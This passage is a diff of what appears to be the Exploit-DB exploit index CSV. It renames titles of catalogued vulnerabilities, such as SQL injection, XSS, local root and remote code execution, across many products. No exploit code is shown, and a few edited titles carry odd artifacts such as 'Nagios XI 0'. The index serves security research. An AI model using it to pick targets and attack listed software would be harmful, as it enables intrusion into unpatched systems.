CSRF",2009-11-10,"Andrew Horton",php,webapps,0 -33709,platforms/php/webapps/33709.txt,"Natychmiast CMS - Multiple Cross-Site Scripting and SQL Injection",2010-03-05,"Maciej Gojny",php,webapps,0 +33709,platforms/php/webapps/33709.txt,"Natychmiast CMS - Multiple Cross-Site Scripting / SQL Injection",2010-03-05,"Maciej Gojny",php,webapps,0 33710,platforms/windows/dos/33710.txt,"J. River Media Jukebox 12 - (.mp3) Remote Heap Buffer Overflow",2010-03-04,"Gjoko Krstic",windows,dos,0 33255,platforms/linux/local/33255.txt,"Xen 3.x - pygrub Local Authentication Bypass",2009-09-25,"Jan Lieskovsky",linux,local,0 33247,platforms/hardware/webapps/33247.txt,"OpenFiler 2.99.1 - Arbitrary Code Execution",2014-05-08,"Dolev Farhi",hardware,webapps,0 @@ -30006,7 +30006,7 @@ id,file,description,date,author,platform,type,port 33250,platforms/php/webapps/33250.txt,"Collabtive 1.2 - Stored XSS",2014-05-08,"Deepak Rathore",php,webapps,0 33251,platforms/multiple/dos/33251.txt,"Python - Interpreter Heap Memory Corruption (PoC)",2014-05-08,"Debasish Mandal",multiple,dos,0 33252,platforms/php/webapps/33252.txt,"Cobbler 2.4.x < 2.6.x - LFI",2014-05-08,"Dolev Farhi",php,webapps,0 -33256,platforms/php/webapps/33256.txt,"e107 0.7.x - ('CAPTCHA' Security Bypass and Cross-Site Scripting) Multiple Vulnerabilities",2009-09-28,MustLive,php,webapps,0 +33256,platforms/php/webapps/33256.txt,"e107 0.7.x - ('CAPTCHA' Security Bypass / Cross-Site Scripting) Multiple Vulnerabilities",2009-09-28,MustLive,php,webapps,0 33257,platforms/hardware/remote/33257.txt,"Juniper Junos 8.5/9.0 J - Web Interface Default URI PATH_INFO Parameter XSS",2009-09-22,"Amir Azam",hardware,remote,0 33258,platforms/hardware/remote/33258.txt,"Juniper Junos 8.5/9.0 J-Web Interface /diagnose Multiple Parameter XSS",2009-09-22,"Amir Azam",hardware,remote,0 33259,platforms/hardware/remote/33259.txt,"Juniper Junos 8.5/9.0 J-Web Interface /configuration Multiple Parameter XSS",2009-09-22,"Amir Azam",hardware,remote,0 @@ -30028,10 +30028,10 @@ id,file,description,date,author,platform,type,port 33645,platforms/windows/remote/33645.py,"httpdx 1.5 - 'MKD' Command Directory Traversal",2010-02-15,fb1h2s,windows,remote,0 33342,platforms/php/webapps/33342.txt,"CuteNews 1.4.6 - search.php Multiple Parameter XSS",2009-11-10,"Andrew Horton",php,webapps,0 33280,platforms/hardware/dos/33280.txt,"Palm WebOS 1.0/1.1 - 'LunaSysMgr' Service Denial of Service",2009-10-13,"Townsend Ladd Harris",hardware,dos,0 -33281,platforms/php/webapps/33281.txt,"Achievo 1.x - Multiple Cross-Site Scripting and HTML Injection Vulnerabilities",2009-10-13,"Ryan Dewhurst",php,webapps,0 -33282,platforms/php/webapps/33282.txt,"Dream Poll 3.1 - 'index.php' Cross-Site Scripting and SQL Injection",2009-10-13,infosecstuff,php,webapps,0 +33281,platforms/php/webapps/33281.txt,"Achievo 1.x - Multiple Cross-Site Scripting / HTML Injection Vulnerabilities",2009-10-13,"Ryan Dewhurst",php,webapps,0 +33282,platforms/php/webapps/33282.txt,"Dream Poll 3.1 - 'index.php' Cross-Site Scripting / SQL Injection",2009-10-13,infosecstuff,php,webapps,0 33283,platforms/linux/dos/33283.txt,"Adobe Reader 9.1.3 and Acrobat COM Objects Memory Corruption Remote Code Execution",2009-10-13,Skylined,linux,dos,0 -33284,platforms/multiple/webapps/33284.txt,"Pentaho BI 1.x - Multiple Cross-Site Scripting and Information Disclosure Vulnerabilities",2009-10-14,euronymous,multiple,webapps,0 +33284,platforms/multiple/webapps/33284.txt,"Pentaho BI 1.x - Multiple Cross-Site Scripting / Information Disclosure Vulnerabilities",2009-10-14,euronymous,multiple,webapps,0 33317,platforms/php/webapps/33317.txt,"AlienVault OSSIM 4.6.1 - Authenticated SQL Injection (Metasploit)",2014-05-12,"Chris Hebert",php,webapps,443 33286,platforms/java/webapps/33286.txt,"Eclipse BIRT 2.2.1 - 'run?__report' Parameter Cross-Site Scripting",2009-10-14,"Michele Orru",java,webapps,0 33287,platforms/php/webapps/33287.txt,"bloofoxCMS 0.3.5 - 'search' Parameter Cross-Site Scripting",2009-10-15,"drunken danish rednecks",php,webapps,0 @@ -30129,7 +30129,7 @@ id,file,description,date,author,platform,type,port 33396,platforms/php/webapps/33396.txt,"Zeeways ZeeJobsite 'basic_search_result.php' Cross-Site Scripting",2009-12-10,bi0,php,webapps,0 33397,platforms/linux/dos/33397.txt,"MySQL 6.0.9 SELECT Statement WHERE Clause Sub-query DoS",2009-11-23,"Shane Bester",linux,dos,0 33398,platforms/linux/dos/33398.txt,"MySQL 6.0.9 - GeomFromWKB() Function First Argument Geometry Value Handling DoS",2009-11-23,"Shane Bester",linux,dos,0 -33399,platforms/multiple/remote/33399.txt,"Oracle E-Business Suite 11i Multiple Remote Vulnerabilities",2009-12-14,Hacktics,multiple,remote,0 +33399,platforms/multiple/remote/33399.txt,"Oracle E-Business Suite 11i - Multiple Remote Vulnerabilities",2009-12-14,Hacktics,multiple,remote,0 33400,platforms/php/webapps/33400.txt,"Ez Cart 'sid' Parameter Cross-Site Scripting",2009-12-14,anti-gov,php,webapps,0 33435,platforms/php/webapps/33435.txt,"ClarkConnect Linux 5.0 - 'proxy.php' Cross-Site Scripting",2009-12-22,"Edgard Chammas",php,webapps,0 33436,platforms/php/webapps/33436.txt,"PHP-Calendar 1.1 update08.php configfile Parameter Traversal Local File Inclusion",2009-12-21,"Juan Galiana Lara",php,webapps,0 @@ -30153,7 +30153,7 @@ id,file,description,date,author,platform,type,port 33454,platforms/windows/remote/33454.py,"Easy Address Book Web Server 1.6 - Stack Buffer Overflow",2014-05-21,superkojiman,windows,remote,0 33455,platforms/hardware/webapps/33455.txt,"Binatone DT 850W Wireless Router - Multiple CSRF Vulnerabilities",2014-05-21,"Samandeep Singh",hardware,webapps,0 33456,platforms/php/webapps/33456.txt,"Stardevelop Live Help 2.6 - 'SERVER' Parameter Multiple Cross-Site Scripting Vulnerabilities",2009-12-31,indoushka,php,webapps,0 -33457,platforms/php/webapps/33457.txt,"Photokorn 1.542 - Cross-Site Scripting and Remote File Inclusion",2009-12-31,indoushka,php,webapps,0 +33457,platforms/php/webapps/33457.txt,"Photokorn 1.542 - Cross-Site Scripting / Remote File Inclusion",2009-12-31,indoushka,php,webapps,0 33458,platforms/php/webapps/33458.txt,"Discuz! 1.0 - 'referer' Parameter Cross-Site Scripting",2009-12-31,indoushka,php,webapps,0 33459,platforms/php/webapps/33459.txt,"DieselPay 1.6 - Cross-Site Scripting / Directory Traversal",2009-12-31,indoushka,php,webapps,0 33460,platforms/php/webapps/33460.txt,"Reamday Enterprises Magic News Plus 1.0.2 - Cross-Site Scripting",2010-01-01,indoushka,php,webapps,0 @@ -30171,7 +30171,7 @@ id,file,description,date,author,platform,type,port 33472,platforms/multiple/dos/33472.py,"Sun Java System Web Server 6.1/7.0 HTTP 'TRACE' Heap Buffer Overflow",2010-01-06,"Evgeny Legerov",multiple,dos,0 33473,platforms/php/webapps/33473.txt,"RoundCube Webmail 0.2 - Cross-Site Scripting",2010-01-06,"j4ck and Globus",php,webapps,0 33474,platforms/php/webapps/33474.txt,"Joomla! DM Orders Component - 'id' Parameter SQL Injection",2010-01-07,NoGe,php,webapps,0 -33475,platforms/php/webapps/33475.txt,"dotProject 2.1.3 - Multiple SQL Injection and HTML Injection Vulnerabilities",2010-01-07,"Justin C. Klein Keane",php,webapps,0 +33475,platforms/php/webapps/33475.txt,"dotProject 2.1.3 - Multiple SQL Injection / HTML Injection Vulnerabilities",2010-01-07,"Justin C. Klein Keane",php,webapps,0 33478,platforms/php/webapps/33478.txt,"Joomla! Jobads 'type' Parameter SQL Injection",2010-01-08,N0KT4,php,webapps,0 33479,platforms/osx/dos/33479.c,"Mac OS X 10.x - 'libc/strtod(3)' Memory Corruption",2010-01-08,"Maksymilian Arciemowicz",osx,dos,0 33480,platforms/linux/dos/33480.txt,"MATLAB R2009b - 'dtoa' Implementation Memory Corruption",2010-01-08,"Maksymilian Arciemowicz",linux,dos,0 @@ -30218,7 +30218,7 @@ id,file,description,date,author,platform,type,port 33574,platforms/php/webapps/33574.txt,"Discuz! 6.0 - 'tid' Parameter Cross-Site Scripting",2010-01-27,s4r4d0,php,webapps,0 33575,platforms/cfm/webapps/33575.txt,"CommonSpot Server 'utilities/longproc.cfm' Cross-Site Scripting",2010-01-28,"Richard Brain",cfm,webapps,0 33576,platforms/linux/local/33576.txt,"Battery Life Toolkit 1.0.9 - 'bltk_sudo' Local Privilege Escalation",2010-01-28,"Matthew Garrett",linux,local,0 -33589,platforms/linux/local/33589.c,"Linux Kernel 3.2.0-23 / <= 3.5.0-23 (Ubuntu 12.04/12.04.1/12.04.2 x64) - 'perf_swevent_init' Local Root Exploit (3)",2014-05-31,"Vitaly Nikolenko",linux,local,0 +33589,platforms/linux/local/33589.c,"Linux Kernel 3.2.0-23 / 3.5.0-23 (Ubuntu 12.04/12.04.1/12.04.2 x64) - 'perf_swevent_init' Local Root Exploit (3)",2014-05-31,"Vitaly Nikolenko",linux,local,0 33523,platforms/linux/local/33523.c,"Linux Kernel < 2.6.28 - 'fasync_helper()' Local Privilege Escalation",2009-12-16,"Tavis Ormandy",linux,local,0 33524,platforms/linux/dos/33524.txt,"OpenOffice 3.1 - (.csv) Remote Denial of Service",2010-01-14,"Hellcode Research",linux,dos,0 33525,platforms/php/remote/33525.txt,"Zend Framework 1.9.6 - Multiple Input Validation Vulnerabilities / Security Bypass Weakness",2010-01-14,"draic Brady",php,remote,0 @@ -30425,7 +30425,7 @@ id,file,description,date,author,platform,type,port 33773,platforms/php/webapps/33773.txt,"tenfourzero.net Shutter 0.1.4 - 'admin.html' Multiple SQL Injection",2010-03-18,blake,php,webapps,0 33774,platforms/multiple/remote/33774.txt,"IBM Lotus Notes 6.5.6 - 'names.nsf' Open Redirection",2010-03-19,Lament,multiple,remote,0 33775,platforms/windows/dos/33775.py,"Xilisoft Video Converter Wizard - (.yuv) Stack Buffer Overflow",2010-03-19,ITSecTeam,windows,dos,0 -33776,platforms/php/webapps/33776.txt,"Kempt SiteDone 2.0 - 'detail.php' Cross-Site Scripting and SQL Injection",2010-03-18,d3v1l,php,webapps,0 +33776,platforms/php/webapps/33776.txt,"Kempt SiteDone 2.0 - 'detail.php' Cross-Site Scripting / SQL Injection",2010-03-18,d3v1l,php,webapps,0 33777,platforms/php/webapps/33777.txt,"PHPWind 6.0 - Multiple Cross-Site Scripting Vulnerabilities",2010-03-19,Liscker,php,webapps,0 33778,platforms/windows/dos/33778.pl,"Remote Help HTTP 0.0.7 GET Request Format String Denial Of Service",2010-03-20,Rick2600,windows,dos,0 33779,platforms/jsp/webapps/33779.txt,"agXchange ESM 'ucschcancelproc.jsp' Open Redirection",2010-03-22,Lament,jsp,webapps,0 @@ -30479,7 +30479,7 @@ id,file,description,date,author,platform,type,port 33826,platforms/linux/remote/33826.txt,"TCPDF 4.5.036/4.9.5 - 'params' Attribute Remote Code Execution Weakness",2010-04-08,apoc,linux,remote,0 33827,platforms/php/webapps/33827.txt,"Istgah For Centerhost 'view_ad.php' Cross-Site Scripting",2010-04-07,indoushka,php,webapps,0 33829,platforms/windows/remote/33829.c,"WinSoftMagic Photo Editor PNG File Buffer Overflow",2010-04-09,eidelweiss,windows,remote,0 -33830,platforms/php/webapps/33830.txt,"Lunar CMS 3.3 - CSRF And Stored XSS",2014-06-21,LiquidWorm,php,webapps,0 +33830,platforms/php/webapps/33830.txt,"Lunar CMS 3.3 - CSRF / Stored XSS",2014-06-21,LiquidWorm,php,webapps,0 33832,platforms/php/webapps/33832.txt,"TANDBERG Video Communication Server 4.2.1/4.3.0 - Multiple Remote Vulnerabilities",2010-04-12,"Jon Hart",php,webapps,0 33833,platforms/php/webapps/33833.txt,"Blog System 1.x - Multiple Input Validation Vulnerabilities",2010-04-12,"cp77fk4r ",php,webapps,0 33834,platforms/php/webapps/33834.txt,"Vana CMS 'filename' Parameter Remote File Download",2010-04-13,"Pouya Daneshmand",php,webapps,0 @@ -30522,7 +30522,7 @@ id,file,description,date,author,platform,type,port 33873,platforms/multiple/remote/33873.txt,"HP System Management Homepage 'RedirectUrl' Parameter URI Redirection",2010-04-25,"Aung Khant",multiple,remote,0 33874,platforms/php/webapps/33874.txt,"Ektron CMS400.NET 7.5.2 - Multiple Security Vulnerabilities",2010-04-26,"Richard Moore",php,webapps,0 33875,platforms/php/webapps/33875.txt,"HuronCMS 'index.php' Multiple SQL Injection",2010-03-30,mat,php,webapps,0 -33876,platforms/multiple/dos/33876.c,"NovaSTOR NovaNET 11.0 - Remote DoS and arbitrary memory read",2007-09-14,mu-b,multiple,dos,0 +33876,platforms/multiple/dos/33876.c,"NovaSTOR NovaNET 11.0 - Remote DoS / arbitrary memory read",2007-09-14,mu-b,multiple,dos,0 33877,platforms/multiple/remote/33877.c,"NovaSTOR NovaNET 12.0 - Remote Root Exploit",2007-09-25,mu-b,multiple,remote,0 33878,platforms/multiple/remote/33878.c,"NovaSTOR NovaNET 12.0 - Remote SYSTEM Exploit",2007-09-25,mu-b,multiple,remote,0 33879,platforms/multiple/dos/33879.c,"NovaSTOR NovaNET/NovaBACKUP 13.0 Remote DoS",2007-10-02,mu-b,multiple,dos,0 @@ -30572,7 +30572,7 @@ id,file,description,date,author,platform,type,port 33916,platforms/cfm/webapps/33916.txt,"Mango Blog 1.4.1 - 'archives.cfm/search' Cross-Site Scripting",2010-05-03,MustLive,cfm,webapps,0 33917,platforms/php/webapps/33917.txt,"Billwerx RC5.2.2 PL2 - 'primary_number' Parameter SQL Injection",2010-05-02,indoushka,php,webapps,0 33918,platforms/php/webapps/33918.txt,"CF Image Hosting Script 1.1 - 'upload.php' Arbitrary File Upload",2010-05-01,The.Morpheus,php,webapps,0 -33919,platforms/php/webapps/33919.txt,"NolaPro Enterprise 4.0.5538 - Cross-Site Scripting and SQL Injection",2010-05-01,ekse,php,webapps,0 +33919,platforms/php/webapps/33919.txt,"NolaPro Enterprise 4.0.5538 - Cross-Site Scripting / SQL Injection",2010-05-01,ekse,php,webapps,0 33920,platforms/php/remote/33920.php,"PHP 5.3 - 'php_dechunk()' HTTP Chunked Encoding Integer Overflow",2010-05-02,"Stefan Esser",php,remote,0 33921,platforms/php/webapps/33921.txt,"IslamSound Multiple SQL Injection",2010-05-03,JIKO,php,webapps,0 33922,platforms/php/webapps/33922.txt,"CH-CMS.ch 2 - Multiple Arbitrary File Upload Vulnerabilities",2010-03-15,EL-KAHINA,php,webapps,0 @@ -30652,7 +30652,7 @@ id,file,description,date,author,platform,type,port 34018,platforms/hardware/remote/34018.txt,"U.S.Robotics USR5463 0.06 Firmware setup_ddns.exe HTML Injection",2010-05-20,SH4V,hardware,remote,0 34021,platforms/php/webapps/34021.txt,"Joomla! 'com_horses' Component - 'id' Parameter SQL Injection",2010-05-19,"Kernel Security Group",php,webapps,0 34022,platforms/php/webapps/34022.txt,"StivaSoft Stiva SHOPPING CART 1.0 - 'demo.php' Cross-Site Scripting",2010-01-13,PaL-D3v1L,php,webapps,0 -34023,platforms/php/webapps/34023.txt,"Lisk CMS 4.4 - 'id' Parameter Multiple Cross-Site Scripting and SQL Injection",2010-05-20,"High-Tech Bridge SA",php,webapps,0 +34023,platforms/php/webapps/34023.txt,"Lisk CMS 4.4 - 'id' Parameter Multiple Cross-Site Scripting / SQL Injection",2010-05-20,"High-Tech Bridge SA",php,webapps,0 34024,platforms/php/webapps/34024.txt,"Triburom 'forum.php' Cross-Site Scripting",2010-01-15,"ViRuSMaN ",php,webapps,0 34030,platforms/lin_x86/webapps/34030.txt,"Infoblox 6.8.2.11 - OS Command Injection",2014-07-10,"Nate Kettlewell",lin_x86,webapps,0 34025,platforms/php/webapps/34025.txt,"C99.php Shell - Authentication Bypass",2014-07-10,Mandat0ry,php,webapps,0 @@ -30741,7 +30741,7 @@ id,file,description,date,author,platform,type,port 34340,platforms/multiple/dos/34340.txt,"Unreal Engine - 'ReceivedRawBunch()' Denial Of Service",2010-07-15,"Luigi Auriemma",multiple,dos,0 34341,platforms/php/webapps/34341.txt,"WX-Guestbook 1.1.208 - SQL Injection / HTML Injection",2009-09-21,learn3r,php,webapps,0 34342,platforms/php/webapps/34342.txt,"Ez Poll Hoster Multiple Cross-Site Scripting Vulnerabilities",2009-12-14,"Milos Zivanovic ",php,webapps,0 -34100,platforms/php/webapps/34100.txt,"Omeka 2.2 - CSRF And Stored XSS",2014-07-17,LiquidWorm,php,webapps,80 +34100,platforms/php/webapps/34100.txt,"Omeka 2.2 - CSRF / Stored XSS",2014-07-17,LiquidWorm,php,webapps,80 34139,platforms/php/webapps/34139.txt,"Yamamah Photo Gallery 1.00 - 'download.php' Local File Disclosure",2010-06-13,mat,php,webapps,0 34140,platforms/php/webapps/34140.txt,"AneCMS 1.x - 'modules/blog/index.php' HTML Injection",2010-06-11,"High-Tech Bridge SA",php,webapps,0 34113,platforms/php/webapps/34113.py,"SilverStripe CMS 2.4 File Renaming Security Bypass",2010-06-09,"John Leitch",php,webapps,0 @@ -30797,7 +30797,7 @@ id,file,description,date,author,platform,type,port 34185,platforms/php/webapps/34185.txt,"Pre Projects Multi-Vendor Shopping Malls 'products.php' SQL Injection",2010-06-23,CoBRa_21,php,webapps,0 34186,platforms/multiple/remote/34186.txt,"Apache Axis2 1.x - '/axis2/axis2-admin' Session Fixation",2010-06-23,"Tiago Ferreira Barbosa",multiple,remote,0 34187,platforms/hardware/webapps/34187.txt,"Ubiquiti UbiFi / mFi / AirVision - CSRF",2014-07-28,"Seth Art",hardware,webapps,80 -34190,platforms/php/webapps/34190.txt,"Oxwall 1.7.0 - Multiple CSRF And HTML Injection Vulnerabilities",2014-07-28,LiquidWorm,php,webapps,80 +34190,platforms/php/webapps/34190.txt,"Oxwall 1.7.0 - Multiple CSRF / HTML Injection Vulnerabilities",2014-07-28,LiquidWorm,php,webapps,80 34191,platforms/php/remote/34191.py,"Oxwall 1.7.0 - Remote Code Execution Exploit",2014-07-28,LiquidWorm,php,remote,80 34192,platforms/linux/remote/34192.txt,"Mozilla Firefox/Thunderbird/SeaMonkey - XSLT Integer Overflow",2010-06-22,"Martin Barbella",linux,remote,0 34194,platforms/asp/webapps/34194.txt,"Lois Software WebDB 2.0A Script Multiple SQL Injection",2010-06-24,"High-Tech Bridge SA",asp,webapps,0 @@ -30808,7 +30808,7 @@ id,file,description,date,author,platform,type,port 34200,platforms/hardware/remote/34200.txt,"Cisco Adaptive Security Response HTTP Response Splitting",2010-06-25,"Daniel King",hardware,remote,0 34201,platforms/linux/remote/34201.txt,"feh 1.7 - '--wget-timestamp' Remote Code Execution",2010-06-25,anonymous,linux,remote,0 34203,platforms/hardware/dos/34203.txt,"Dlink DWR-113 Rev. Ax - CSRF Denial of Service",2014-07-30,"Blessen Thomas",hardware,dos,0 -34204,platforms/php/webapps/34204.html,"SkaDate Lite 2.0 - Multiple CSRF And Persistent XSS Vulnerabilities",2014-07-30,LiquidWorm,php,webapps,80 +34204,platforms/php/webapps/34204.html,"SkaDate Lite 2.0 - Multiple CSRF / Persistent XSS Vulnerabilities",2014-07-30,LiquidWorm,php,webapps,80 34205,platforms/php/webapps/34205.py,"SkaDate Lite 2.0 - Remote Code Execution Exploit",2014-07-30,LiquidWorm,php,webapps,80 34206,platforms/hardware/webapps/34206.txt,"D-Link AP 3200 - Multiple Vulnerabilities",2014-07-30,pws,hardware,webapps,80 34207,platforms/php/webapps/34207.txt,"Customer Paradigm PageDirector 'id' Parameter SQL Injection",2010-06-28,Tr0y-x,php,webapps,0 @@ -30846,7 +30846,7 @@ id,file,description,date,author,platform,type,port 34239,platforms/php/webapps/34239.txt,"Status2k Server Monitoring Software - Multiple Vulnerabilities",2014-08-02,"Shayan S",php,webapps,80 34240,platforms/ios/webapps/34240.txt,"TigerCom iFolder+ 1.2 iOS - Multiple Vulnerabilities",2014-08-02,Vulnerability-Lab,ios,webapps,8080 34241,platforms/linux/webapps/34241.txt,"ISPConfig 3.0.54p1 - Authenticated Admin Local Root",2014-08-02,mra,linux,webapps,8080 -34336,platforms/php/webapps/34336.html,"Disqus for WordPress 2.7.5 - Admin Stored CSRF and XSS",2014-08-14,"Nik Cubrilovic",php,webapps,80 +34336,platforms/php/webapps/34336.html,"Disqus for WordPress 2.7.5 - Admin Stored CSRF / XSS",2014-08-14,"Nik Cubrilovic",php,webapps,80 34337,platforms/php/webapps/34337.txt,"Gekko Web Builder 9.0 - 'index.php' Cross-Site Scripting",2010-07-15,"High-Tech Bridge SA",php,webapps,0 34338,platforms/php/webapps/34338.html,"Pixie 1.0.4 - HTML Injection / Cross-Site Scripting",2010-07-15,"High-Tech Bridge SA",php,webapps,0 34243,platforms/ios/webapps/34243.txt,"Photo WiFi Transfer 1.01 - Directory Traversal",2014-08-02,Vulnerability-Lab,ios,webapps,8080 @@ -30960,7 +30960,7 @@ id,file,description,date,author,platform,type,port 34368,platforms/windows/dos/34368.c,"Mthree Development MP3 to WAV Decoder - (.mp3) Remote Buffer Overflow",2009-10-31,4m!n,windows,dos,0 34369,platforms/multiple/remote/34369.txt,"IBM Java UTF8 Byte Sequences Security Bypass",2010-07-23,IBM,multiple,remote,0 34370,platforms/jsp/webapps/34370.txt,"SAP Netweaver 6.4/7.0 - 'wsnavigator' Cross-Site Scripting",2010-07-23,"Alexandr Polyakov",jsp,webapps,0 -34372,platforms/multiple/remote/34372.txt,"PacketVideo Twonky Server 4.4.17/5.0.65 - Cross-Site Scripting and HTML Injection Vulnerabilities",2009-11-01,"Davide Canali",multiple,remote,0 +34372,platforms/multiple/remote/34372.txt,"PacketVideo Twonky Server 4.4.17/5.0.65 - Cross-Site Scripting / HTML Injection Vulnerabilities",2009-11-01,"Davide Canali",multiple,remote,0 34373,platforms/php/webapps/34373.txt,"MC Content Manager 10.1 - SQL Injection / Cross-Site Scripting",2010-07-25,MustLive,php,webapps,0 34374,platforms/php/webapps/34374.txt,"Joomla! FreiChat Component 1.0/2.x Unspecified HTML Injection",2010-07-26,nag_sunny,php,webapps,0 34375,platforms/linux/dos/34375.txt,"sSMTP 2.62 - 'standardize()' Buffer Overflow",2010-07-26,"Brendan Boerner",linux,dos,0 @@ -30976,7 +30976,7 @@ id,file,description,date,author,platform,type,port 34384,platforms/jsp/webapps/34384.txt,"Jira 4.0.1 - Cross-Site Scripting / Information Disclosure",2010-07-28,MaXe,jsp,webapps,0 34385,platforms/linux/remote/34385.txt,"KVIrc 4.0 - '\r' Carriage Return in DCC Handshake Remote Command Execution",2010-07-28,unic0rn,linux,remote,0 34386,platforms/php/webapps/34386.txt,"Cetera eCommerce Multiple SQL Injection",2010-07-28,MustLive,php,webapps,0 -34387,platforms/php/webapps/34387.txt,"Cetera eCommerce Multiple Cross-Site Scripting and HTML Injection Vulnerabilities",2010-07-28,MustLive,php,webapps,0 +34387,platforms/php/webapps/34387.txt,"Cetera eCommerce - Multiple Cross-Site Scripting / HTML Injection Vulnerabilities",2010-07-28,MustLive,php,webapps,0 34388,platforms/php/webapps/34388.txt,"SPIP 2.1 - 'var_login' Parameter Cross-Site Scripting",2010-07-28,dotsafe.fr,php,webapps,0 34389,platforms/php/webapps/34389.txt,"Impact Software Ad Peeps Cross-Site Scripting / HTML Injection",2010-07-27,Matt,php,webapps,0 34390,platforms/php/remote/34390.rb,"HybridAuth install.php PHP Code Execution",2014-08-21,Metasploit,php,remote,80 @@ -31015,16 +31015,16 @@ id,file,description,date,author,platform,type,port 34427,platforms/linux/dos/34427.txt,"OpenSSL - 'ssl3_get_key_exchange()' Use-After-Free Memory Corruption",2010-08-07,"Georgi Guninski",linux,dos,0 34424,platforms/php/webapps/34424.txt,"WooCommerce Store Exporter 1.7.5 - Multiple XSS Vulnerabilities",2014-08-27,"Mike Manzotti",php,webapps,0 34428,platforms/windows/dos/34428.py,"Quintessential Media Player 5.0.121 - (.m3u) Buffer Overflow",2010-08-09,"Abhishek Lyall",windows,dos,0 -34429,platforms/asp/webapps/34429.txt,"Allinta CMS 22.07.2010 - Multiple SQL Injection and Cross-Site Scripting Vulnerabilities",2010-08-09,"High-Tech Bridge SA",asp,webapps,0 +34429,platforms/asp/webapps/34429.txt,"Allinta CMS 22.07.2010 - Multiple SQL Injection / Cross-Site Scripting Vulnerabilities",2010-08-09,"High-Tech Bridge SA",asp,webapps,0 34430,platforms/php/webapps/34430.txt,"Preation Eden Platform 27.7.2010 - Multiple HTML Injection Vulnerabilities",2010-08-09,"High-Tech Bridge SA",php,webapps,0 -34431,platforms/linux/remote/34431.html,"Nagios XI Multiple Cross-Site Request Forgery Vulnerabilities",2010-08-07,"Adam Baldwin",linux,remote,0 +34431,platforms/linux/remote/34431.html,"Nagios XI 0 Multiple Cross-Site Request Forgery Vulnerabilities",2010-08-07,"Adam Baldwin",linux,remote,0 34432,platforms/php/webapps/34432.txt,"Wowd 'index.html' Multiple Cross-Site Scripting Vulnerabilities",2009-10-29,Lostmon,php,webapps,0 34433,platforms/php/webapps/34433.txt,"Simple Directory Listing 2.1 - 'SDL2.php' Cross-Site Scripting",2010-10-22,"Amol Naik",php,webapps,0 -34456,platforms/php/webapps/34456.txt,"JBoard Multiple Cross-Site Scripting and SQL Injection",2009-08-31,Inj3ct0r,php,webapps,0 +34456,platforms/php/webapps/34456.txt,"JBoard Multiple Cross-Site Scripting / SQL Injection",2009-08-31,Inj3ct0r,php,webapps,0 34436,platforms/php/webapps/34436.txt,"WordPress ShortCode Plugin 0.2.3 - Local File Inclusion",2014-08-28,"Mehdi Karout and Christian Galeone",php,webapps,0 34437,platforms/windows/remote/34437.txt,"Portable Document Format - Specification Signature Collision",2010-08-11,"Florian Zumbiehl",windows,remote,0 34438,platforms/php/webapps/34438.txt,"MybbCentral TagCloud 2.0 - 'Topic' Field HTML Injection",2010-08-11,3ethicalhackers.com,php,webapps,0 -34439,platforms/multiple/remote/34439.txt,"ServletExec - (Directory Traversal and Authentication-Bypass) Multiple Vulnerabilities",2010-08-12,"Stefano Di Paola",multiple,remote,0 +34439,platforms/multiple/remote/34439.txt,"ServletExec - (Directory Traversal / Authentication-Bypass) Multiple Vulnerabilities",2010-08-12,"Stefano Di Paola",multiple,remote,0 34440,platforms/jsp/webapps/34440.txt,"Computer Associates Oneview Monitor 6.0 - 'doSave.jsp' Remote Code Execution",2010-08-12,"Giorgio Fedon",jsp,webapps,0 34441,platforms/php/webapps/34441.txt,"JForum 2.08 BBCode Color Tag HTML Injection",2010-05-13,"Giorgio Fedon",php,webapps,0 34442,platforms/windows/dos/34442.html,"Kylinsoft InstantGet 2.08 - ActiveX Control 'ShowBar' Method Buffer Overflow",2009-09-19,the_Edit0r,windows,dos,0 @@ -31063,7 +31063,7 @@ id,file,description,date,author,platform,type,port 34478,platforms/windows/remote/34478.html,"Microsoft Internet Explorer 8 - 'toStaticHTML()' HTML Sanitization Bypass Weakness",2010-08-16,"Mario Heiderich",windows,remote,0 34479,platforms/php/webapps/34479.html,"CMSimple 3.3 - Cross-Site Scripting / Cross-Site Request Forgery",2010-08-16,"High-Tech Bridge SA",php,webapps,0 34480,platforms/windows/dos/34480.py,"Xilisoft Video Converter 3.1.8.0720b - (.ogg) Buffer Overflow",2010-08-16,"Praveen Darshanam",windows,dos,0 -34481,platforms/php/webapps/34481.txt,"123 Flash Chat Multiple Security Vulnerabilities",2010-08-16,Lincoln,php,webapps,0 +34481,platforms/php/webapps/34481.txt,"123 Flash Chat = Multiple Security Vulnerabilities",2010-08-16,Lincoln,php,webapps,0 34482,platforms/php/webapps/34482.txt,"TurnkeyForms Yahoo Answers Clone 'questiondetail.php' Cross-Site Scripting",2009-08-10,Moudi,php,webapps,0 34483,platforms/php/webapps/34483.txt,"Nasim Guest Book 'page' Parameter Cross-Site Scripting",2010-08-10,Moudi,php,webapps,0 34484,platforms/php/webapps/34484.txt,"Joomla! 'com_dirfrm' Component Multiple SQL Injection",2010-08-18,Hieuneo,php,webapps,0 @@ -31108,7 +31108,7 @@ id,file,description,date,author,platform,type,port 34533,platforms/php/webapps/34533.txt,"Auto CMS 1.6 - 'autocms.php' Cross-Site Scripting",2010-08-23,"High-Tech Bridge SA",php,webapps,0 34534,platforms/php/webapps/34534.txt,"TCMS - Multiple Input Validation Vulnerabilities",2010-08-26,"High-Tech Bridge SA",php,webapps,0 34535,platforms/php/webapps/34535.txt,"Valarsoft WebMatic 3.0.5 - Multiple HTML Injection Vulnerabilities",2010-08-26,"High-Tech Bridge SA",php,webapps,0 -34536,platforms/php/webapps/34536.txt,"CompuCMS - Multiple SQL Injection and Cross-Site Scripting Vulnerabilities",2010-08-26,"High-Tech Bridge SA",php,webapps,0 +34536,platforms/php/webapps/34536.txt,"CompuCMS - Multiple SQL Injection / Cross-Site Scripting Vulnerabilities",2010-08-26,"High-Tech Bridge SA",php,webapps,0 34537,platforms/linux/local/34537.txt,"EncFS 1.6.0 - Flawed CBC/CFB Cryptography Implementation Weaknesses",2010-08-26,"Micha Riser",linux,local,0 34538,platforms/php/webapps/34538.txt,"WordPress Plugins Premium Gallery Manager - Unauthenticated Configuration Access",2014-09-05,Hannaichi,php,webapps,80 34539,platforms/php/webapps/34539.txt,"MyBB User Social Networks Plugin 1.2 - Stored XSS",2014-09-05,"Fikri Fadzil",php,webapps,80 @@ -31221,7 +31221,7 @@ id,file,description,date,author,platform,type,port 34661,platforms/php/webapps/34661.txt,"x10 MP3 Automatic Search Engine 1.6.5b info.php name Parameter XSS",2009-08-29,Moudi,php,webapps,0 34662,platforms/php/webapps/34662.txt,"x10 MP3 Automatic Search Engine 1.6.5b lyrics.php id Parameter 